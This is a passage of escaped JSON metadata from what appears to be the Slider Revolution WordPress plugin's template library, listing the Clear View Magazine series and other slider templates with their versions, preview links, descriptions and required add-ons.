Grid\",\"alias\":\"immersion-grid\",\"zip\":\"packs\\/immersion-grid.zip\",\"uid\":\"b6903868189bb83b2c7a852fde3a7dc3\",\"img\":\"immersion-grid\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.1\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"200\":{\"id\":\"218\",\"title\":\"Funky Intro Slider\",\"alias\":\"funkyslider\",\"zip\":\"funkyslider.zip\",\"uid\":\"2d4187e3fdad19b976be335253c8925d\",\"img\":\"funkyslider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/funky-intro-slider-wordpress-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=funky-intro-slider-wordpress-plugin\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This funky intro slider fits just right if you need a striking introduction to your website! Sleek, beautiful and easily customizable!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"201\":{\"id\":\"219\",\"title\":\"Clear View Magazine\",\"alias\":\"clear-view-magazine-package\",\"zip\":\"\",\"uid\":\"clear-view-magazine-package\",\"img\":\"packages\\/clear_view_magazine_overview.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"202\":{\"id\":\"220\",\"title\":\"Clear View Menu\",\"alias\":\"clearview_menu\",\"zip\":\"packs\\/clearview_menu.zip\",\"uid\":\"eaecee5fa5f3c3a7f4d2a96c4616a353\",\"img\":\"clearview_menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"203\":{\"id\":\"221\",\"title\":\"Clear View Header\",\"alias\":\"clearview_header\",\"zip\":\"packs\\/clearview_header.zip\",\"uid\":\"25e3dd80ad130875d7438a07952cb0cd\",\"img\":\"clearview_header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"204\":{\"id\":\"222\",\"title\":\"Clear View Mission\",\"alias\":\"clearview_mission\",\"zip\":\"packs\\/clearview_mission.zip\",\"uid\":\"35b2092a49fd2beb549342e69097eb5b\",\"img\":\"clearview_mission\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"205\":{\"id\":\"223\",\"title\":\"Clear View Slider\",\"alias\":\"clear-view-slider\",\"zip\":\"packs\\/clear-view-slider.zip\",\"uid\":\"d2e17edffce16ed78c54b0ef23fd7e05\",\"img\":\"clear-view-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"206\":{\"id\":\"224\",\"title\":\"Clear View News\",\"alias\":\"clear-view-news\",\"zip\":\"packs\\/clear-view-news.zip\",\"uid\":\"5698d3131ba141e9afcfd2906739dd00\",\"img\":\"clear-view-news\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"207\":{\"id\":\"225\",\"title\":\"Clear View Clients\",\"alias\":\"clear-view-clients\",\"zip\":\"packs\\/clear-view-clients.zip\",\"uid\":\"b95616a94832e22bdfac5ce60232be1b\",\"img\":\"clear-view-clients\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"208\":{\"id\":\"226\",\"title\":\"Clear View Contact\",\"alias\":\"clear-view-contact\",\"zip\":\"packs\\/clear-view-contact.zip\",\"uid\":\"0e0cc1d8f6f6500e5f8a2b091fa3b4cb\",\"img\":\"clear-view-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-minimal-magazine-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-minimal-magazine-wordpress-template\",\"version\":\"1.0.3\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Magazine\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"11\",\"installed\":false},\"209\":{\"id\":\"227\",\"title\":\"Clear View Post Page\",\"alias\":\"clear-view-post-page-package\",\"zip\":\"\",\"uid\":\"clear-view-post-page-package\",\"img\":\"packages\\/clear_view_post_page_overview.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"210\":{\"id\":\"228\",\"title\":\"Clear View Single Menu\",\"alias\":\"clear-view-single-menu\",\"zip\":\"packs\\/clear-view-single-menu.zip\",\"uid\":\"1e80f81982f8a4ea763482d4fa99d321\",\"img\":\"clear-view-single-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"211\":{\"id\":\"229\",\"title\":\"Clear View Single Header\",\"alias\":\"clear-view-single-header\",\"zip\":\"packs\\/clear-view-single-header.zip\",\"uid\":\"c8d717627be6cd5e70922ab609694dbf\",\"img\":\"clear-view-single-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"212\":{\"id\":\"230\",\"title\":\"Clear View Single Media\",\"alias\":\"clear-view-single-media\",\"zip\":\"packs\\/clear-view-single-media.zip\",\"uid\":\"c480368ded2a64f0cdd44f1674213814\",\"img\":\"clear-view-single-media\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"213\":{\"id\":\"231\",\"title\":\"Clear View Single More\",\"alias\":\"clear-view-single-more\",\"zip\":\"packs\\/clear-view-single-more.zip\",\"uid\":\"9c693190df26218366d1f77e10cf550a\",\"img\":\"clear-view-single-more\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"214\":{\"id\":\"232\",\"title\":\"Clear View Single Contact\",\"alias\":\"clear-view-single-contact\",\"zip\":\"packs\\/clear-view-single-contact.zip\",\"uid\":\"73c0a889f2b654a87b5aba1ff76fbc5c\",\"img\":\"clear-view-single-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-view-single-post-page-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-view-single-post-page-wordpress-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Clear View Post Page\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"12\",\"installed\":false},\"215\":{\"id\":\"233\",\"title\":\"Clean Landing Page\",\"alias\":\"cleanlandingpage\",\"zip\":\"cleanlandingpage.zip\",\"uid\":\"727a3680d312f22c6a5998ebdb9afe52\",\"img\":\"cleanlandingpage\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clean-landing-page-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clean-landing-page-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clean Landing Page is a fullscreen Intro Module that is a striking introduction to any minimal website, with no unnecessary elements.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"216\":{\"id\":\"234\",\"title\":\"Clear Cut\",\"alias\":\"clearcut\",\"zip\":\"clearcut.zip\",\"uid\":\"07f43c00e9b4d3057a03cdb3385ad2b7\",\"img\":\"clearcut\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/clear-cut-portfolio-website-for-wordpress\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=clear-cut-portfolio-website-for-wordpress\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Clear Cut Template is an All-In-One Portfolio Website solution that works best for smaller portfolios. Highlight your best work in a striking and mobile friendly fashion!<\\/span>\\r\\n<span 